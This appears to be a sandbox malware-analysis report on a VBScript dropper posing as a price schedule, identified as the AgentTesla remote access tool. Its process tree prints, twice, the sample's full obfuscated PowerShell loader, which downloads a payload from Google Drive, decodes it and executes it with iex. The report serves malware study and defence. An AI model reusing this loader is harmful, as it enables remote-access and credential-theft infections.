Analysis

  • max time kernel
    140s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system
  • submitted
    21/05/2024, 03:42

General

  • Target

    RFQINL21052024_PRICE SCHEDULE.vbs

  • Size

    4KB

  • MD5

    de9bd11a9b255ed79c168051414c5ec2

  • SHA1

    863a99be31ef99e905bd44e472fd342b7104777b

  • SHA256

    841bfb8481e179f4d401d0b58b8230eb7c474914e3ca2e4e550e0dc9ef231113

  • SHA512

    361f095e88a387dd164350c35f80d4bc5ac1b440dc4cddff4c4e6529d863791a23997a5f97a0c803594c933dbc0fd537435b9b507815ca836396d0ec828a63bb

  • SSDEEP

    96:QhlUfeZsBmpDAcPV1kW//GOsxoJ8YFlRhpeilDg33FPU0C+WEKfp:Q3r8cPnx/Go5kilQfCXEKfp

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQINL21052024_PRICE SCHEDULE.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. 
DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
        3⤵
          PID:2028
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Trichechidae = 1;$Sinssygeste='Sub';$Sinssygeste+='strin';$Sinssygeste+='g';Function Afglatningen($Delightable){$Yachtman=$Delightable.Length-$Trichechidae;For($Sesterces=1;$Sesterces -lt $Yachtman;$Sesterces+=2){$getter+=$Delightable.$Sinssygeste.Invoke( $Sesterces, $Trichechidae);}$getter;}function Loafers($Mandslingers){& ($Verfende) ($Mandslingers);}$Kunstmaler191=Afglatningen 'OMdoVzEiOl lMas/F5H. 0U u(PWSi,nTd oHw sK NcT, ,1 0 . 0 ;B CW,i,nE6 4E;A ,xM6G4.;H WrTvs: 1 2,1.. 0 )B MG eUc,k.oS/ 2 0,1T0 0A1,0 1R BF,iFrFe,fSoIx./G1 2 1.. 0D ';$Schiavones122=Afglatningen '.Ucs.e,rC-RA gBe nStU ';$Disangularizes=Afglatningen ' hrt t p sR: /P/Sdnr i v.e .,gHotoFgNlCeS. c o,m,/ u c.?DeSxMp.oSr tK=nd oNwKnTlco a d &piKdO=C1,X j,p.iNpC-BoUR -Il.4G3 HP9 V yDM._,F,4D0,yAROIB8 3SQTNLu,-PX.e ';$Dictery=Afglatningen ' >O ';$Verfende=Afglatningen ',i.e.xC ';$Srgespillet='Unfulfilment';$Anobiidae = Afglatningen ' e cPh oO L% aEpDp diaKt aR% \,VDiTg eNs iumSa t.i o,n . S o,rH ,& &D le c h,o. BtN ';Loafers (Afglatningen 'H$CgUl o bCa.lB:ES,hAeupLhAe r dWi,z el=T( cSm d. ,/Mc O$ A nSo bPiFiGd aUe )M ');Loafers (Afglatningen 'T$,g l,oOb,aPl :HCTo n.sFpIeIcAt,u iPt ym=A$KD iAs a n g.u lKaSr i z,e,s .,sEp,l i t ( $ D.iHc tFeSrRyT)S ');$Disangularizes=$Conspectuity[0];$Flygtningehjlpene= (Afglatningen '.$ gUlHoMbAaSlC:EC hSaFr,tCe rsiFsGt,=,N eSw,-FO,b.j ePc,tS AS.yBsFt epmP.FNde tt.ZWSe.b C lAiBetn t');$Flygtningehjlpene+=$Shepherdize[1];Loafers ($Flygtningehjlpene);Loafers (Afglatningen 'I$FCVhba,r,tUeFr i sPtH. H e.aOd e,r sC[P$USGc,hAiBabv oSnNe.s,1 2M2L] =S$CK uEnAsFt,mDaRlOe rD1 9 1 ');$Hjbane=Afglatningen ' $ C h.aSrIt eBr i sStI. 
DMoBwnnBlEo,a dGFUiLl,e (s$cDHi.s a nEgIuRlna.rLiPz eHs,,.$ U,r.f jDe l d )S ';$Urfjeld=$Shepherdize[0];Loafers (Afglatningen 'I$,g l oPb,a,l :PE nUf e o.f,fDe dF= ( TIe sdt,-.P a.tKh $,U,r f jme.lLdD), ');while (!$Enfeoffed) {Loafers (Afglatningen 'A$ gFl oPbPaSl :SFga.lAcUh iGo nKsM= $ t,rGu,e ') ;Loafers $Hjbane;Loafers (Afglatningen 'BSEtDaSrAtB-nS lse,e.pC 4 ');Loafers (Afglatningen '.$ gGlDoTbFa.lt:.EIn f ePo.f.fVeAdG=.( TSeMs t.-PPOaPtvhP P$,UGrDfNj ePl dB) ') ;Loafers (Afglatningen 'T$Og.l o bGaOl.: g o,eIr,eVsC=G$ g.lko bCaTl :ADSaByEs.tRaMrCs + +S%Y$.C oFn s p eScStBu iNtBy .Dc,omupn tS ') ;$Disangularizes=$Conspectuity[$goeres];}$Forsyndelsers=370814;$Tagetone211=26725;Loafers (Afglatningen 'S$HgRl oAbEa lU:AL gJd o m m,mCe r oGrLd nBi,n g eSrIn,e. f=R ,G e.t,-.CAo,nGtSe n t $ UPr.fSj.e lPdT ');Loafers (Afglatningen 'M$ gPlSoOb aPlN:NS p.i.n a e H=B S[ES.y sRt,e m .ICSogn.v e r tS] :M:,FSr.o,mRBJa sMeR6 4HS t rLiUn g.(r$ML gKdAoSmSmFmOe rToErldPn iBnFgDe r nCeA) ');Loafers (Afglatningen 'P$ g.lGo b.a,l :MW h,o,s,uSmPd e v eNrR .=, F[ SOyTsRtMe,m ..TAelxOtS.FE nUc oDd i n.g ] :,:VA,SJC,ICI .KG,eUtKS t,rNiUn gC( $RS pGiKnUa,eD)p ');Loafers (Afglatningen ' $ g,lToTb arlR: S uKbBaDrOmLo rC= $KW h.o sbu.m d eIvPeTr ..sOuMb sFt r,iNn g (.$ F oPrMsUyFnBdLeAlXs e,rHsS,U$,T a gAe.t o nAe.2W1S1b) ');Loafers $Subarmor;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2200
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Vigesimation.Sor && echo t"
            4⤵
              PID:1628
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2716

      Network

            MITRE ATT&CK Enterprise v15


            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

              Filesize

              68KB

              MD5

              29f65ba8e88c063813cc50a4ea544e93

              SHA1

              05a7040d5c127e68c25d81cc51271ffb8bef3568

              SHA256

              1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

              SHA512

              e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

              Filesize

              1KB

              MD5

              a266bb7dcc38a562631361bbf61dd11b

              SHA1

              3b1efd3a66ea28b16697394703a72ca340a05bd5

              SHA256

              df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

              SHA512

              0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

              Filesize

              344B

              MD5

              6aef994d68f80872bbf1cb884113b678

              SHA1

              de09b9436dc85dcb209eb0e984ef5f7b10f4a262

              SHA256

              3f8012ec29eccbb3e4685be408337b2e5cf35ccc5c73cbbfe6c895c15f87ab7c

              SHA512

              ed86a16edb52333378e8371b5e50344d245eff170049bf79dfad62482b23cd450f3e657ba8c7b749f5f04a12681cf5d1cd0df98553f079703528b89f0b1dc16a

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

              Filesize

              242B

              MD5

              f23167d80233f717903aa79369a7f3a4

              SHA1

              5cccfb014056de3c0a8810c706d637953ff17782

              SHA256

              300042cba8afd16029d8afeb196d6940e2df4f2e5feb1ced58a63f8f9dfe4e28

              SHA512

              777e54e3b1ae324c5e2b9544314a96bf2a13cfed6e78d9e5de4cffac5c87290613502967eb5f5f763c289a2ceb0169e898504c0513f52c701dbff79d1e57f346

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\11PMM5DR0IT9S7NTEZNV.temp

              Filesize

              7KB

              MD5

              ca0cb62acb863e6a43bb5e7e904723d6

              SHA1

              c7a33fd935a74bf51c50d63f313c286943fcad7e

              SHA256

              c9bf41ee6976cada8f38656686108183962a89341875323cb954e12c08ab15e5

              SHA512

              d90c8897e22bbada46e2e276a458c7683a2c886b9277cc21084e1e7eca6a7a483e5dd866a097d2f2908badc18807b98d8d57c2b43c1e019f2b8da55416f91648

            • C:\Users\Admin\AppData\Roaming\Vigesimation.Sor

              Filesize

              517KB

              MD5

              3d5345e787f5607ceeab0031c358f539

              SHA1

              19dc82bb214aa4cedc883e99d3d29b196d83a330

              SHA256

              dc9e8d1b6623366e4063a886706dc448452d26c216d2c450e9f4c89a963f18d2

              SHA512

              8f57a41e65493c8747dab6c4880e6de94b4eb8b6249a0d4c7063f65952de0c72990e9d9382f43c72142c1351247b1bbe99a915effd81507c2a9f76c12ed2720f

            • memory/2200-32-0x00000000065D0000-0x000000000972C000-memory.dmp

              Filesize

              49.4MB

            • memory/2640-9-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-11-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-10-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-31-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-4-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp

              Filesize

              4KB

            • memory/2640-33-0x000007FEF54CE000-0x000007FEF54CF000-memory.dmp

              Filesize

              4KB

            • memory/2640-8-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-6-0x0000000002800000-0x0000000002808000-memory.dmp

              Filesize

              32KB

            • memory/2640-7-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2640-5-0x000000001B570000-0x000000001B852000-memory.dmp

              Filesize

              2.9MB

            • memory/2640-61-0x000007FEF5210000-0x000007FEF5BAD000-memory.dmp

              Filesize

              9.6MB

            • memory/2716-60-0x0000000000B50000-0x0000000001BB2000-memory.dmp

              Filesize

              16.4MB

            • memory/2716-62-0x0000000000B50000-0x0000000000B92000-memory.dmp

              Filesize

              264KB